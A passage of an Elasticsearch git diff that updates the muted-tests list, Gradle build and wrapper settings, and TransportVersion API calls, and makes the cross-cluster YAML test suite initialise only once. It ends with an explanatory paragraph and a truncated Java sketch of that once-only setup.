org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=transform/transforms_stats/Test get multiple transform stats where one does not have a task} issue: https://github.com/elastic/elasticsearch/issues/126863 @@ -356,24 +284,12 @@ tests: - class: org.elasticsearch.cli.keystore.AddStringKeyStoreCommandTests method: testStdinWithMultipleValues issue: https://github.com/elastic/elasticsearch/issues/126882 -- class: org.elasticsearch.packaging.test.DockerTests - method: test024InstallPluginFromArchiveUsingConfigFile - issue: https://github.com/elastic/elasticsearch/issues/126936 -- class: org.elasticsearch.packaging.test.DockerTests - method: test026InstallBundledRepositoryPlugins - issue: https://github.com/elastic/elasticsearch/issues/127081 -- class: org.elasticsearch.packaging.test.DockerTests - method: test026InstallBundledRepositoryPluginsViaConfigFile - issue: https://github.com/elastic/elasticsearch/issues/127158 - class: org.elasticsearch.xpack.remotecluster.CrossClusterEsqlRCS2EnrichUnavailableRemotesIT method: testEsqlEnrichWithSkipUnavailable issue: https://github.com/elastic/elasticsearch/issues/127368 - class: org.elasticsearch.xpack.test.rest.XPackRestIT method: test {p0=ml/data_frame_analytics_cat_apis/Test cat data frame analytics all jobs with header} issue: https://github.com/elastic/elasticsearch/issues/127625 -- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT - method: testCancellationViaTimeoutWithAllowPartialResultsSetToFalse - issue: https://github.com/elastic/elasticsearch/issues/127096 - class: org.elasticsearch.xpack.ccr.action.ShardFollowTaskReplicationTests method: testChangeFollowerHistoryUUID issue: https://github.com/elastic/elasticsearch/issues/127680 @@ -383,48 +299,18 @@ tests: - class: org.elasticsearch.backwards.MixedClusterClientYamlTestSuiteIT method: test {p0=search/350_point_in_time/point-in-time with index filter} issue: https://github.com/elastic/elasticsearch/issues/127741 -- class: org.elasticsearch.packaging.test.DockerTests - method: test025SyncPluginsUsingProxy - issue: https://github.com/elastic/elasticsearch/issues/127138 - class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithPartialResultsIT method: testOneRemoteClusterPartial issue: https://github.com/elastic/elasticsearch/issues/124055 - class: org.elasticsearch.xpack.esql.qa.multi_node.EsqlSpecIT method: test {lookup-join.MvJoinKeyOnTheLookupIndex ASYNC} issue: https://github.com/elastic/elasticsearch/issues/128030 -- class: org.elasticsearch.packaging.test.DockerTests - method: test042KeystorePermissionsAreCorrect - issue: https://github.com/elastic/elasticsearch/issues/128018 -- class: org.elasticsearch.packaging.test.DockerTests - method: test072RunEsAsDifferentUserAndGroup - issue: https://github.com/elastic/elasticsearch/issues/128031 -- class: org.elasticsearch.packaging.test.DockerTests - method: test122CanUseDockerLoggingConfig - issue: https://github.com/elastic/elasticsearch/issues/128110 -- class: org.elasticsearch.packaging.test.DockerTests - method: test041AmazonCaCertsAreInTheKeystore - issue: https://github.com/elastic/elasticsearch/issues/128006 -- class: org.elasticsearch.packaging.test.DockerTests - method: test130JavaHasCorrectOwnership - issue: https://github.com/elastic/elasticsearch/issues/128174 -- class: org.elasticsearch.packaging.test.DockerTests - method: test600Interrupt - issue: https://github.com/elastic/elasticsearch/issues/128144 - class: org.elasticsearch.packaging.test.EnrollmentProcessTests method: 
test20DockerAutoFormCluster issue: https://github.com/elastic/elasticsearch/issues/128113 -- class: org.elasticsearch.packaging.test.DockerTests - method: test121CanUseStackLoggingConfig - issue: https://github.com/elastic/elasticsearch/issues/128165 -- class: org.elasticsearch.packaging.test.DockerTests - method: test080ConfigurePasswordThroughEnvironmentVariableFile - issue: https://github.com/elastic/elasticsearch/issues/128075 - class: org.elasticsearch.ingest.geoip.GeoIpDownloaderCliIT method: testInvalidTimestamp issue: https://github.com/elastic/elasticsearch/issues/128284 -- class: org.elasticsearch.packaging.test.DockerTests - method: test120DockerLogsIncludeElasticsearchLogs - issue: https://github.com/elastic/elasticsearch/issues/128117 - class: org.elasticsearch.packaging.test.TemporaryDirectoryConfigTests method: test21AcceptsCustomPathInDocker issue: https://github.com/elastic/elasticsearch/issues/128114 @@ -434,45 +320,15 @@ tests: - class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT method: testCCSClusterDetailsWhereAllShardsSkippedInCanMatch issue: https://github.com/elastic/elasticsearch/issues/128418 -- class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithFiltersIT - method: testTimestampFilterFromQuery - issue: https://github.com/elastic/elasticsearch/issues/127332 - class: org.elasticsearch.xpack.esql.plugin.DataNodeRequestSenderIT method: testSearchWhileRelocating issue: https://github.com/elastic/elasticsearch/issues/128500 -- class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithPartialResultsIT - method: testFailToStartRequestOnRemoteCluster - issue: https://github.com/elastic/elasticsearch/issues/128545 -- class: org.elasticsearch.packaging.test.DockerTests - method: test124CanRestartContainerWithStackLoggingConfig - issue: https://github.com/elastic/elasticsearch/issues/128121 -- class: org.elasticsearch.packaging.test.DockerTests - method: test085EnvironmentVariablesAreRespectedUnderDockerExec - issue: https://github.com/elastic/elasticsearch/issues/128115 - class: org.elasticsearch.compute.operator.LimitOperatorTests method: testEarlyTermination issue: https://github.com/elastic/elasticsearch/issues/128721 -- class: org.elasticsearch.packaging.test.DockerTests - method: test040JavaUsesTheOsProvidedKeystore - issue: https://github.com/elastic/elasticsearch/issues/128230 -- class: org.elasticsearch.packaging.test.DockerTests - method: test150MachineDependentHeap - issue: https://github.com/elastic/elasticsearch/issues/128120 - class: org.elasticsearch.xpack.inference.InferenceGetServicesIT method: testGetServicesWithCompletionTaskType issue: https://github.com/elastic/elasticsearch/issues/128952 -- class: org.elasticsearch.packaging.test.DockerTests - method: test073RunEsAsDifferentUserAndGroupWithoutBindMounting - issue: https://github.com/elastic/elasticsearch/issues/128996 -- class: org.elasticsearch.upgrades.UpgradeClusterClientYamlTestSuiteIT - method: test {p0=upgraded_cluster/70_ilm/Test Lifecycle Still There And Indices Are Still Managed} - issue: https://github.com/elastic/elasticsearch/issues/129097 -- class: org.elasticsearch.upgrades.UpgradeClusterClientYamlTestSuiteIT - method: test {p0=upgraded_cluster/90_ml_data_frame_analytics_crud/Get mixed cluster outlier_detection job} - issue: https://github.com/elastic/elasticsearch/issues/129098 -- class: org.elasticsearch.packaging.test.DockerTests - method: test081SymlinksAreFollowedWithEnvironmentVariableFiles - issue: 
https://github.com/elastic/elasticsearch/issues/128867 - class: org.elasticsearch.xpack.esql.qa.single_node.GenerativeForkIT method: test {lookup-join.EnrichLookupStatsBug ASYNC} issue: https://github.com/elastic/elasticsearch/issues/129228 @@ -494,30 +350,12 @@ tests: - class: org.elasticsearch.xpack.ml.integration.ClassificationIT method: testWithDatastreams issue: https://github.com/elastic/elasticsearch/issues/129457 -- class: org.elasticsearch.index.engine.ThreadPoolMergeExecutorServiceDiskSpaceTests - method: testMergeTasksAreUnblockedWhenMoreDiskSpaceBecomesAvailable - issue: https://github.com/elastic/elasticsearch/issues/129296 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testCanManageIndexWithNoPermissions - issue: https://github.com/elastic/elasticsearch/issues/129471 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testCanManageIndexAndPolicyDifferentUsers - issue: https://github.com/elastic/elasticsearch/issues/129479 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testCanViewExplainOnUnmanagedIndex - issue: https://github.com/elastic/elasticsearch/issues/129480 - class: org.elasticsearch.xpack.profiling.action.GetStatusActionIT method: testWaitsUntilResourcesAreCreated issue: https://github.com/elastic/elasticsearch/issues/129486 -- class: org.elasticsearch.xpack.security.PermissionsIT - method: testWhenUserLimitedByOnlyAliasOfIndexCanWriteToIndexWhichWasRolledoverByILMPolicy - issue: https://github.com/elastic/elasticsearch/issues/129481 - class: org.elasticsearch.xpack.esql.qa.multi_node.EsqlSpecIT method: test {knn-function.KnnSearchWithKOption SYNC} issue: https://github.com/elastic/elasticsearch/issues/129512 -- class: org.elasticsearch.index.engine.ThreadPoolMergeExecutorServiceTests - method: testIORateIsAdjustedForAllRunningMergeTasks - issue: https://github.com/elastic/elasticsearch/issues/129531 - class: org.elasticsearch.upgrades.IndexingIT method: testIndexing issue: https://github.com/elastic/elasticsearch/issues/129533 @@ -530,50 +368,90 @@ tests: - class: org.elasticsearch.search.query.VectorIT method: testFilteredQueryStrategy issue: https://github.com/elastic/elasticsearch/issues/129517 -- class: org.elasticsearch.test.apmintegration.TracesApmIT - method: testApmIntegration - issue: https://github.com/elastic/elasticsearch/issues/129651 -- class: org.elasticsearch.snapshots.SnapshotShutdownIT - method: testSnapshotShutdownProgressTracker - issue: https://github.com/elastic/elasticsearch/issues/129752 - class: org.elasticsearch.xpack.security.SecurityRolesMultiProjectIT method: testUpdatingFileBasedRoleAffectsAllProjects issue: https://github.com/elastic/elasticsearch/issues/129775 - class: org.elasticsearch.qa.verify_version_constants.VerifyVersionConstantsIT method: testLuceneVersionConstant issue: https://github.com/elastic/elasticsearch/issues/125638 -- class: org.elasticsearch.index.store.FsDirectoryFactoryTests - method: testPreload - issue: https://github.com/elastic/elasticsearch/issues/129852 -- class: org.elasticsearch.xpack.rank.rrf.RRFRankClientYamlTestSuiteIT - method: test {yaml=rrf/950_pinned_interaction/rrf with pinned retriever as a sub-retriever} - issue: https://github.com/elastic/elasticsearch/issues/129845 -- class: org.elasticsearch.xpack.test.rest.XPackRestIT - method: test {p0=esql/60_usage/Basic ESQL usage output (telemetry) non-snapshot version} - issue: https://github.com/elastic/elasticsearch/issues/129888 - class: 
org.elasticsearch.gradle.internal.InternalDistributionBwcSetupPluginFuncTest method: "builds distribution from branches via archives extractedAssemble [bwcDistVersion: 8.2.1, bwcProject: bugfix, expectedAssembleTaskName: extractedAssemble, #2]" issue: https://github.com/elastic/elasticsearch/issues/119871 -- class: org.elasticsearch.xpack.inference.qa.mixed.CohereServiceMixedIT - method: testRerank - issue: https://github.com/elastic/elasticsearch/issues/130009 -- class: org.elasticsearch.xpack.inference.qa.mixed.CohereServiceMixedIT - method: testCohereEmbeddings - issue: https://github.com/elastic/elasticsearch/issues/130010 -- class: org.elasticsearch.xpack.esql.qa.mixed.MixedClusterEsqlSpecIT - issue: https://github.com/elastic/elasticsearch/issues/128224 - class: org.elasticsearch.cluster.metadata.ComposableIndexTemplateTests method: testMergeEmptyMappingsIntoTemplateWithNonEmptySettings issue: https://github.com/elastic/elasticsearch/issues/130050 -- class: org.elasticsearch.xpack.esql.qa.multi_node.GenerativeIT - method: test - issue: https://github.com/elastic/elasticsearch/issues/130067 - class: geoip.GeoIpMultiProjectIT issue: https://github.com/elastic/elasticsearch/issues/130073 -- class: org.elasticsearch.xpack.esql.qa.single_node.GenerativeIT - method: test - issue: https://github.com/elastic/elasticsearch/issues/130067 +- class: org.elasticsearch.search.SearchWithRejectionsIT + method: testOpenContextsAfterRejections + issue: https://github.com/elastic/elasticsearch/issues/130821 +- class: org.elasticsearch.index.IndexingPressureIT + method: testWriteCanRejectOnPrimaryBasedOnMaxOperationSize + issue: https://github.com/elastic/elasticsearch/issues/130281 +- class: org.elasticsearch.index.IndexingPressureIT + method: testWriteCanBeRejectedAtPrimaryLevel + issue: https://github.com/elastic/elasticsearch/issues/131151 +- class: org.elasticsearch.repositories.s3.S3ServiceTests + method: testGetClientRegionFromEndpointSettingGuess + issue: https://github.com/elastic/elasticsearch/issues/131392 +- class: org.elasticsearch.packaging.test.DockerTests + method: test050BasicApiTests + issue: https://github.com/elastic/elasticsearch/issues/120911 +- class: org.elasticsearch.packaging.test.DockerTests + method: test071BindMountCustomPathWithDifferentUID + issue: https://github.com/elastic/elasticsearch/issues/120917 +- class: org.elasticsearch.xpack.esql.action.CrossClusterQueryWithPartialResultsIT + method: testPartialResults + issue: https://github.com/elastic/elasticsearch/issues/131481 +- class: org.elasticsearch.packaging.test.DockerTests + method: test022InstallPluginsFromLocalArchive + issue: https://github.com/elastic/elasticsearch/issues/116866 +- class: org.elasticsearch.packaging.test.DockerTests + method: test140CgroupOsStatsAreAvailable + issue: https://github.com/elastic/elasticsearch/issues/131372 +- class: org.elasticsearch.packaging.test.DockerTests + method: test070BindMountCustomPathConfAndJvmOptions + issue: https://github.com/elastic/elasticsearch/issues/131366 +- class: org.elasticsearch.packaging.test.DockerTests + method: test171AdditionalCliOptionsAreForwarded + issue: https://github.com/elastic/elasticsearch/issues/120925 +- class: org.elasticsearch.packaging.test.DockerTests + method: test130JavaHasCorrectOwnership + issue: https://github.com/elastic/elasticsearch/issues/131369 +- class: org.elasticsearch.packaging.test.DockerTests + method: test151MachineDependentHeapWithSizeOverride + issue: https://github.com/elastic/elasticsearch/issues/123437 +- class: 
org.elasticsearch.search.sort.FieldSortIT + method: testSortMixedFieldTypes + issue: https://github.com/elastic/elasticsearch/issues/129445 +- class: org.elasticsearch.gradle.LoggedExecFuncTest + method: failed tasks output logged to console when spooling true + issue: https://github.com/elastic/elasticsearch/issues/119509 +- class: org.elasticsearch.packaging.test.DockerTests + method: test010Install + issue: https://github.com/elastic/elasticsearch/issues/131376 +- class: org.elasticsearch.packaging.test.DockerTests + method: test072RunEsAsDifferentUserAndGroup + issue: https://github.com/elastic/elasticsearch/issues/131412 +- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT + method: testRemoteClusterOnlyCCSWithFailuresOnOneShardOnly + issue: https://github.com/elastic/elasticsearch/issues/133673 +- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT + method: testCancelViaExpirationOnRemoteResultsWithMinimizeRoundtrips + issue: https://github.com/elastic/elasticsearch/issues/127302 +- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT + method: testCancellationViaTimeoutWithAllowPartialResultsSetToFalse + issue: https://github.com/elastic/elasticsearch/issues/131248 +- class: org.elasticsearch.xpack.kql.parser.KqlParserBooleanQueryTests + method: testParseAndQuery + issue: https://github.com/elastic/elasticsearch/issues/133871 +- class: org.elasticsearch.xpack.kql.parser.KqlParserBooleanQueryTests + method: testParseOrQuery + issue: https://github.com/elastic/elasticsearch/issues/133863 +- class: org.elasticsearch.xpack.writeloadforecaster.WriteLoadForecasterIT + method: testWriteLoadForecastGetsPopulatedDuringRollovers + issue: https://github.com/elastic/elasticsearch/issues/134123 # Examples: # diff --git a/plugins/discovery-ec2/build.gradle b/plugins/discovery-ec2/build.gradle index 454508d0298f9..f4eb1d3a90f01 100644 --- a/plugins/discovery-ec2/build.gradle +++ b/plugins/discovery-ec2/build.gradle @@ -15,31 +15,6 @@ esplugin { classname ='org.elasticsearch.discovery.ec2.Ec2DiscoveryPlugin' } -def patched = Attribute.of('patched', Boolean) - -configurations { - compileClasspath { - attributes { - attribute(patched, true) - } - } - runtimeClasspath { - attributes { - attribute(patched, true) - } - } - testCompileClasspath { - attributes { - attribute(patched, true) - } - } - testRuntimeClasspath { - attributes { - attribute(patched, true) - } - } -} - dependencies { implementation "software.amazon.awssdk:annotations:${versions.awsv2sdk}" @@ -90,17 +65,6 @@ dependencies { testImplementation project(':test:fixtures:ec2-imds-fixture') internalClusterTestImplementation project(':test:fixtures:ec2-imds-fixture') - - attributesSchema { - attribute(patched) - } - artifactTypes.getByName("jar") { - attributes.attribute(patched, false) - } - registerTransform(org.elasticsearch.gradle.internal.dependencies.patches.awsv2sdk.Awsv2ClassPatcher) { - from.attribute(patched, false) - to.attribute(patched, true) - } } tasks.named("dependencyLicenses").configure { diff --git a/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java b/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java index 8aaa9ee5ad5e7..d72c04edc815e 100644 --- a/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java +++ 
b/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java @@ -134,6 +134,6 @@ public SuggestionSearchContext.SuggestionContext build(SearchExecutionContext co @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/plugins/examples/gradle/wrapper/gradle-wrapper.properties b/plugins/examples/gradle/wrapper/gradle-wrapper.properties index c4a852da571d7..01450089d2c6c 100644 --- a/plugins/examples/gradle/wrapper/gradle-wrapper.properties +++ b/plugins/examples/gradle/wrapper/gradle-wrapper.properties @@ -1,7 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionSha256Sum=443c9c8ee2ac1ee0e11881a40f2376d79c66386264a44b24a9f8ca67e633375f -distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.2-all.zip +distributionSha256Sum=f759b8dd5204e2e3fa4ca3e73f452f087153cf81bac9561eeb854229cc2c5365 +distributionUrl=https\://services.gradle.org/distributions/gradle-9.0.0-all.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java b/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java index 4beb926bea752..a8e1c4f2c8382 100644 --- a/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java +++ b/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java @@ -222,6 +222,6 @@ public Explanation explain(int topLevelDocId, IndexSearcher searcher, RescoreCon @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml b/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml index 1022253171a11..dbe45c7527967 100644 --- a/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml +++ b/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml @@ -3,3 +3,6 @@ ALL-UNNAMED: - relative_path: "indices/" relative_to: data mode: read_write + - relative_path: "" + relative_to: shared_data + mode: read_write diff --git a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java index 44abbf2652f95..c70827aeb2ec3 100644 --- a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java +++ b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java @@ -52,6 +52,8 @@ import java.util.Map; import java.util.Optional; import java.util.Set; +import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicReference; import java.util.function.BiPredicate; import java.util.stream.Collectors; import java.util.stream.Stream; @@ -67,7 +69,7 @@ * using the client running against the "write" cluster. 
* */ -@TimeoutSuite(millis = 15 * TimeUnits.MINUTE) // to account for slow as hell VMs +@TimeoutSuite(millis = 20 * TimeUnits.MINUTE) // to account for slow as hell VMs public class CcsCommonYamlTestSuiteIT extends ESClientYamlSuiteTestCase { private static final Logger logger = LogManager.getLogger(CcsCommonYamlTestSuiteIT.class); @@ -78,6 +80,12 @@ public class CcsCommonYamlTestSuiteIT extends ESClientYamlSuiteTestCase { // the remote cluster is the one we write index operations etc... to private static final String REMOTE_CLUSTER_NAME = "remote_cluster"; + private static final AtomicBoolean isRemoteConfigured = new AtomicBoolean(false); + private static final AtomicBoolean isCombinedComputed = new AtomicBoolean(false); + private static final AtomicReference<TestFeatureService> combinedTestFeatureServiceRef = new AtomicReference<>(); + private static final AtomicReference<Set<String>> combinedOsSetRef = new AtomicReference<>(); + private static final AtomicReference<Set<String>> combinedNodeVersionsRef = new AtomicReference<>(); + private static LocalClusterConfigProvider commonClusterConfig = cluster -> cluster.module("x-pack-async-search") .module("aggregations") .module("analysis-common") @@ -163,25 +171,26 @@ public void initSearchClient() throws IOException { } clusterHosts = unmodifiableList(hosts); logger.info("initializing REST search clients against {}", clusterHosts); - searchClient = buildClient(restClientSettings(), clusterHosts.toArray(new HttpHost[clusterHosts.size()])); - adminSearchClient = buildClient(restAdminSettings(), clusterHosts.toArray(new HttpHost[clusterHosts.size()])); + searchClient = buildClient(restClientSettings(), clusterHosts.toArray(new HttpHost[0])); + adminSearchClient = buildClient(restAdminSettings(), clusterHosts.toArray(new HttpHost[0])); searchYamlTestClient = new TestCandidateAwareClient(getRestSpec(), searchClient, hosts, this::getClientBuilderWithSniffedHosts); - // check that we have an established CCS connection - Request request = new Request("GET", "_remote/info"); - Response response = adminSearchClient.performRequest(request); - assertOK(response); - ObjectPath responseObject = ObjectPath.createFromResponse(response); - assertNotNull(responseObject.evaluate(REMOTE_CLUSTER_NAME)); - assertNull(responseObject.evaluate(REMOTE_CLUSTER_NAME + ".cluster_credentials")); - logger.info("Established connection to remote cluster [" + REMOTE_CLUSTER_NAME + "]"); + assert searchClient != null; + assert adminSearchClient != null; + assert clusterHosts != null; + + if (isRemoteConfigured.compareAndSet(false, true)) { + // check that we have an established CCS connection + Request request = new Request("GET", "_remote/info"); + Response response = adminSearchClient.performRequest(request); + assertOK(response); + ObjectPath responseObject = ObjectPath.createFromResponse(response); + assertNotNull(responseObject.evaluate(REMOTE_CLUSTER_NAME)); + assertNull(responseObject.evaluate(REMOTE_CLUSTER_NAME + ".cluster_credentials")); + logger.info("Established connection to remote cluster [" + REMOTE_CLUSTER_NAME + "]"); + } } - - assert searchClient != null; - assert adminSearchClient != null; - assert clusterHosts != null; - searchYamlTestClient.setTestCandidate(getTestCandidate()); } @@ -299,44 +308,46 @@ protected ClientYamlTestExecutionContext createRestTestExecutionContext( final Set<String> osSet ) { try { - // Ensure the test specific initialization is run by calling it explicitly (@Before annotations on base-derived class may - // be called in a different order) - initSearchClient(); - // Reconcile and
provide unified features, os, version(s), based on both clientYamlTestClient and searchYamlTestClient - var searchOs = readOsFromNodesInfo(adminSearchClient); - var searchNodeVersions = readVersionsFromNodesInfo(adminSearchClient); - var semanticNodeVersions = searchNodeVersions.stream() - .map(ESRestTestCase::parseLegacyVersion) - .flatMap(Optional::stream) - .collect(Collectors.toSet()); - final TestFeatureService searchTestFeatureService = createTestFeatureService( - getClusterStateFeatures(adminSearchClient), - semanticNodeVersions - ); - final TestFeatureService combinedTestFeatureService = (featureId, any) -> { - boolean adminFeature = testFeatureService.clusterHasFeature(featureId, any); - boolean searchFeature = searchTestFeatureService.clusterHasFeature(featureId, any); - return any ? adminFeature || searchFeature : adminFeature && searchFeature; - }; - final Set<String> combinedOsSet = Stream.concat(osSet.stream(), Stream.of(searchOs)).collect(Collectors.toSet()); - final Set<String> combinedNodeVersions = Stream.concat(nodesVersions.stream(), searchNodeVersions.stream()) - .collect(Collectors.toSet()); + if (isCombinedComputed.compareAndSet(false, true)) { + // Ensure the test specific initialization is run by calling it explicitly (@Before annotations on base-derived class may + // be called in a different order) + initSearchClient(); + // Reconcile and provide unified features, os, version(s), based on both clientYamlTestClient and searchYamlTestClient + var searchOs = readOsFromNodesInfo(adminSearchClient); + var searchNodeVersions = readVersionsFromNodesInfo(adminSearchClient); + var semanticNodeVersions = searchNodeVersions.stream() + .map(ESRestTestCase::parseLegacyVersion) + .flatMap(Optional::stream) + .collect(Collectors.toSet()); + final TestFeatureService searchTestFeatureService = createTestFeatureService( + getClusterStateFeatures(adminSearchClient), + semanticNodeVersions + ); + final TestFeatureService combinedTestFeatureService = (featureId, any) -> { + boolean adminFeature = testFeatureService.clusterHasFeature(featureId, any); + boolean searchFeature = searchTestFeatureService.clusterHasFeature(featureId, any); + return any ? adminFeature || searchFeature : adminFeature && searchFeature; + }; + final Set<String> combinedOsSet = Stream.concat(osSet.stream(), Stream.of(searchOs)).collect(Collectors.toSet()); + final Set<String> combinedNodeVersions = Stream.concat(nodesVersions.stream(), searchNodeVersions.stream()) + .collect(Collectors.toSet()); + + combinedTestFeatureServiceRef.set(combinedTestFeatureService); + combinedOsSetRef.set(combinedOsSet); + combinedNodeVersionsRef.set(combinedNodeVersions); + } return new ClientYamlTestExecutionContext( clientYamlTestCandidate, clientYamlTestClient, randomizeContentType(), - combinedNodeVersions, - combinedTestFeatureService, - combinedOsSet + combinedNodeVersionsRef.get(), + combinedTestFeatureServiceRef.get(), + combinedOsSetRef.get() ) { // depending on the API called, we either return the client running against the "write" or the "search" cluster here protected ClientYamlTestClient clientYamlTestClient(String apiName) { - if (CCS_APIS.contains(apiName)) { - return searchYamlTestClient; - } else { - return super.clientYamlTestClient(apiName); - } + return CCS_APIS.contains(apiName) ?
searchYamlTestClient : super.clientYamlTestClient(apiName); } }; } catch (IOException e) { diff --git a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java index 0471366b0bd53..9b57fdcaca031 100644 --- a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java +++ b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java @@ -64,7 +64,7 @@ * using the client running against the "write" cluster. * */ -@TimeoutSuite(millis = 20 * TimeUnits.MINUTE) // to account for slow as hell VMs +@TimeoutSuite(millis = 25 * TimeUnits.MINUTE) // to account for slow as hell VMs public class RcsCcsCommonYamlTestSuiteIT extends ESClientYamlSuiteTestCase { private static final Logger logger = LogManager.getLogger(RcsCcsCommonYamlTestSuiteIT.class); diff --git a/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java b/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java index 6ecb85258ed97..d336de92c3e93 100644 --- a/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java +++ b/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java @@ -12,7 +12,6 @@ import com.carrotsearch.randomizedtesting.annotations.Name; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.client.Request; import org.elasticsearch.client.Response; @@ -254,7 +253,7 @@ public void testQueryBuilderBWC() throws Exception { TransportVersion transportVersion; if (originalClusterHasTransportVersion == false) { transportVersion = TransportVersion.fromId( - parseLegacyVersion(getOldClusterVersion()).map(Version::id).orElse(TransportVersions.MINIMUM_COMPATIBLE.id()) + parseLegacyVersion(getOldClusterVersion()).map(Version::id).orElse(TransportVersion.minimumCompatible().id()) ); } else { transportVersion = TransportVersion.readVersion(input); diff --git a/qa/mixed-cluster/build.gradle b/qa/mixed-cluster/build.gradle index dfe4052b09aff..a591d4c590b27 100644 --- a/qa/mixed-cluster/build.gradle +++ b/qa/mixed-cluster/build.gradle @@ -89,6 +89,7 @@ buildParams.bwcVersions.withWireCompatible { bwcVersion, baseName -> setting 'health.master_history.no_master_transitions_threshold', '10' } requiresFeature 'es.index_mode_feature_flag_registered', Version.fromString("8.0.0") + requiresFeature 'sub_objects_auto', Version.fromString("8.16.0") if (bwcVersion.before(Version.fromString("8.18.0"))) { jvmArgs '-da:org.elasticsearch.index.mapper.DocumentMapper' jvmArgs '-da:org.elasticsearch.index.mapper.MapperService' diff --git a/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java b/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java index 79cdc1047aec9..715a009692bf5 100644 --- a/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java +++ b/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java @@ -1333,6 +1333,7 @@ private static Map<String, Object> responseToMap(ObjectPath response) throws IOE Map<String, Object> responseMap = XContentHelper.convertToMap(bytesReference, false, XContentType.JSON).v2(); assertNotNull(responseMap.put("took", -1)); responseMap.remove("num_reduce_phases");
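
The CcsCommonYamlTestSuiteIT change above leans on two small idioms: AtomicBoolean.compareAndSet(false, true) so the remote-cluster check and the feature reconciliation run only once per suite, and a combined feature service that answers "any" semantics with OR and "all" semantics with AND across the two clusters. A minimal, self-contained sketch of both idioms follows; class and method names are illustrative stand-ins (BiPredicate substitutes for TestFeatureService), not code from this change.

import java.util.concurrent.atomic.AtomicBoolean;
import java.util.concurrent.atomic.AtomicReference;
import java.util.function.BiPredicate;

// Hypothetical sketch of the one-time-init and combined-feature-check idioms used above.
public final class CombinedFeatureCheckSketch {

    private static final AtomicBoolean computed = new AtomicBoolean(false);
    private static final AtomicReference<BiPredicate<String, Boolean>> combinedRef = new AtomicReference<>();

    // "any" semantics (some cluster has the feature) -> OR; "all" semantics -> AND.
    static BiPredicate<String, Boolean> combine(BiPredicate<String, Boolean> admin, BiPredicate<String, Boolean> search) {
        return (featureId, any) -> any
            ? admin.test(featureId, any) || search.test(featureId, any)
            : admin.test(featureId, any) && search.test(featureId, any);
    }

    static BiPredicate<String, Boolean> getOrCompute(BiPredicate<String, Boolean> admin, BiPredicate<String, Boolean> search) {
        // compareAndSet(false, true) lets exactly one caller perform the computation. Like the
        // change above, this assumes callers arrive sequentially; a truly concurrent reader could
        // still observe the reference before it is set.
        if (computed.compareAndSet(false, true)) {
            combinedRef.set(combine(admin, search));
        }
        return combinedRef.get();
    }

    public static void main(String[] args) {
        BiPredicate<String, Boolean> admin = (featureId, any) -> "f1".equals(featureId);
        BiPredicate<String, Boolean> search = (featureId, any) -> "f2".equals(featureId);
        var combined = getOrCompute(admin, search);
        System.out.println(combined.test("f1", true));  // true: at least one cluster has f1
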